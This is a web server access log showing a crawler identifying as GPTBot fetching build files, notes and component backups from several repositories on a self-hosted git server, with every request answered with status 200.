+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:54:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20381] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16043] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:54:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14301] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:55:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:55:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12006] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:55:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:14:55:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:55:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16399] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:55:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16915] [Gzip 10.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51200] [Gzip 26.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11403] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10694] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" +[17/Feb/2026:14:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 74.7.227.38] [Length 10299] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:14:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14691] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:14:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:14:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202094] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:14:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10865] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" +[17/Feb/2026:14:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14587] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 11641] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:14:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:14:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10468] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 12740] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" +[17/Feb/2026:14:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 12770] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" +[17/Feb/2026:14:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11871] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 